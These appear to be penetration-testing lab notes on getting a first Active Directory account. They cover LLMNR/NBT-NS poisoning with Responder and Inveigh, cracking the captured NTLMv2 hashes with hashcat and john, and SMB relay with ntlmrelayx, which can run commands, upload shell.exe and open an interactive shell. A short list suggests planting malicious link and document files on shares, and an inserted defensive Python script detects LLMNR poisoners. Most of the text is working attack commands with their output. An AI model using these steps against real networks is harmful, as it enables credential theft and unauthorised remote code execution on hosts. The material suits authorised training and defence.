
Initial Attack Vectors

We do not have a user account yet, but we want to obtain one.

LLMNR Poisoning (Captured NTLMv2 hash)


  • Attack type: MITM
  • Tool: Responder (responder -I eth0 -rdwv; configuration in Responder.conf)
    • Poisoners: LLMNR, NBT-NS, DNS/MDNS
    • Servers: all On except Auth proxy
  • How: capture the NTLMv2 hash and crack it with hashcat

From linux

responder

sudo responder -I eth0 -rdwv
|->
# [SMB] NTLMv2-SSP Client   : 172.16.7.3
# [SMB] NTLMv2-SSP Username : INLANEFREIGHT\AB920
# [SMB] NTLMv2-SSP Hash     : AB920::INLANEFREIGHT:ff598dbec...
hashcat - NTLMv2 hash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

From windows

Inveigh - powershell version install

wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1 -O /opt/windows/Inveigh.ps1
run - (as Administrator)
Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
|->
# [+] [2023-05-07T08:17:35] SMB(445) NTLMv2 captured for INLANEFREIGHT\CT059 from 172.16.7.3(DC01):65001:

echo '<captured NTLMv2 hash>' > hash.txt
|->
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
|->
charlie1         (CT059)

InveighZero - C# version install

wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.9/Inveigh-net6.0-win-x64-trimmed-single-v2.0.9.zip -O /opt/windows/inveigh.zip

unzip /opt/windows/inveigh.zip -d /opt/windows/inveigh
run
# run powershell as Admin
.\Inveigh.exe -Sniffer N
> Press ESC to enter/exit interactive console
>> HELP
>> GET NTLMV2UNIQUE
>> GET NTLMV2USERNAMES

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
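A defender's canary check for the LLMNR poisoning described above, added here as an example that is not part of these notes nor of Responder or Inveigh: it multicasts an LLMNR query for a name that nobody owns, so any host that answers is answering names it should not, which is exactly what a poisoner does. The canary name "wpad-canary-xyz" and SAMPLE_REPLY are constructed; 224.0.0.252:5355 is the standard LLMNR multicast address.

```python
import os
import socket
import struct

def build_llmnr_query(name: str, txid: int) -> bytes:
    # LLMNR reuses the DNS wire format: 12-byte header (flags=0, QDCOUNT=1), one A question
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)          # QTYPE=A, QCLASS=IN

def parse_llmnr_response(data: bytes, txid: int) -> list[str]:
    # IPv4 answers in a reply that matches our txid and has the QR bit set; else []
    if len(data) < 12 or data[:2] != struct.pack("!H", txid) or not data[2] & 0x80:
        return []
    qd, an = struct.unpack("!HH", data[4:8])
    def skip_name(p: int) -> int:                             # labels or a 0xC0 pointer
        while data[p] != 0:
            if data[p] & 0xC0 == 0xC0:
                return p + 2
            p += data[p] + 1
        return p + 1
    pos, answers = 12, []
    for _ in range(qd):                                       # skip the echoed question
        pos = skip_name(pos) + 4
    for _ in range(an):
        pos = skip_name(pos)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        if rtype == 1 and rdlen == 4:
            answers.append(socket.inet_ntoa(data[pos + 10:pos + 14]))
        pos += 10 + rdlen
    return answers

def probe(name: str = "wpad-canary-xyz", timeout: float = 2.0) -> list[str]:
    # Multicast one query for a name nobody owns; any host that answers is a suspect
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), ("224.0.0.252", 5355))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(1024)
            if parse_llmnr_response(data, txid):
                hits.append(src)
    except socket.timeout:
        return hits

# Constructed sample: a poisoner's reply to txid 0x1234 claiming 10.0.0.99 owns the name
SAMPLE_REPLY = (struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0) + b"\x0fwpad-canary-xyz\x00"
                + struct.pack("!HH", 1, 1) + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + bytes([10, 0, 0, 99]))
```

Run probe() from a host on each segment you want to check; a non-empty result means something on that segment is answering names it does not own, and the returned source address is where to look.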

SMB Relay Attacks


  • Prerequisite
    • SMB signing has to be disabled or not required
      • nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24
        • Message signing enabled and required - that is a blocker; we will not be able to relay
        • Message signing enabled but not required - that is what we need (add the IP to targets.txt)
    • We will target the local Administrator hash
  • Attack type: MITM
  • Tool: Responder (responder -I eth0 -rdwv; configuration in /etc/responder/Responder.conf)
    • Poisoners: LLMNR, NBT-NS, DNS/MDNS
    • Servers: SMB = Off and HTTP = Off (Auth proxy = Off), so Responder does not answer those itself and ntlmrelayx can
  • Tool: ntlmrelayx.py -tf targets.txt -smb2support from Impacket
  • How: capture the NTLMv2 authentication and relay it to access another machine
    responder
    responder -I eth0 -rdwv
    
    ntlmrelayx (option 1)
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support
    
    ntlmrelayx (option 2 - execute command)
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -e shell.exe
    
    ntlmrelayx (option 3 - get interactive smb shell)
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -i
    
    connect
    nc 127.0.0.1 11000
    

Other


  • put a malicious link file (hashgrab) on an SMB share
  • put a malicious document file on an SMB share
  • put a malicious document file on an FTP server
  • force an HTTP request to a server you own

Tools


Tool         Description
Responder    Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh      Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit   Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.